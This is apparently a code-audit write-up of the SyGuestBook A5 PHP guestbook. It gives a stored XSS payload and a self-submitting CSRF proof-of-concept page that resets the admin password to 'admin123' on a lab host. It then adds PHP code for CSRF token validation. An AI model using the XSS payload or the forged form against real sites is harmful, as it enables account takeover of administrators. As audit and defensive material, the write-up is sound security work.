Fragrant

Hacker is Crazy.

22 February 2019

SyGuestBook A5 Code Audit

by fragrant

Code audit practice.

0x01 Preparation

0x02 Vulnerabilities

0x001 Stored XSS in the guestbook

whoami
2453465
if i were a boy!<img/src/onerror=alert(/aa/)>

0x002 Stored XSS in the back-end administrator reply/review function

0x003 CSRF vulnerability in the password change function

SyGuestCSRF.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<!-- The form is submitted automatically as soon as the page loads -->
<body onload="document.forms[0].submit();">
<form id=form1 name=form1 action="http://192.168.122.120/code_audit/SyGuestBook_A5/index.php?c=Administrator&a=update&id=1&submit=aaa" method=post>
  <input name="username" type="hidden" value="admin">
  <input name="pass_new" type="hidden" value="admin123">
  <input name="admin" type="hidden" value="admin">
  <input name="gid" type="hidden" value="0">
</form>
</body>
</html>

Open the link http://10.0.0.5:2398/SyGuestCSRF.html and the password will be changed to admin123.
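
One way to close the CSRF hole in 0x003, as an added example that is not SyGuestBook's own code: a per-session token that the password-change handler checks before acting. The function names, the csrf_token field and the array standing in for $_SESSION are assumptions.

```php
<?php
// Added example, not SyGuestBook code. Function names and the
// "csrf_token" field name are hypothetical.

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only for a POST that carries the token stored in the session.
function csrf_valid(array $session, string $method, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($supplied)          // rejects csrf_token[]=... arrays
        && $expected !== ''
        && hash_equals($expected, $supplied);  // constant-time comparison
}

// Hidden field for the application's own form; the value is HTML-encoded on output.
function csrf_field(array &$session): string
{
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '">';
}

// --- Constructed requests for a command-line run ---
$session = [];                    // stands in for $_SESSION
$form = csrf_field($session);     // what the admin's own form would contain

// Cross-site POST shaped like SyGuestCSRF.html: the fields arrive, the token does not.
$forged = ['username' => 'admin', 'pass_new' => 'admin123',
           'admin' => 'admin', 'gid' => '0'];
// The same fields submitted from the application's own form.
$genuine = $forged + ['csrf_token' => $session['csrf_token']];

foreach (['forged' => $forged, 'genuine' => $genuine] as $name => $post) {
    echo $name, ': ', csrf_valid($session, 'POST', $post) ? 'accepted' : 'rejected', "\n";
}
```

In the application, pass $_SESSION, $_SERVER['REQUEST_METHOD'] and $_POST, and run the check before the update action touches the database.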

tags: php - code audit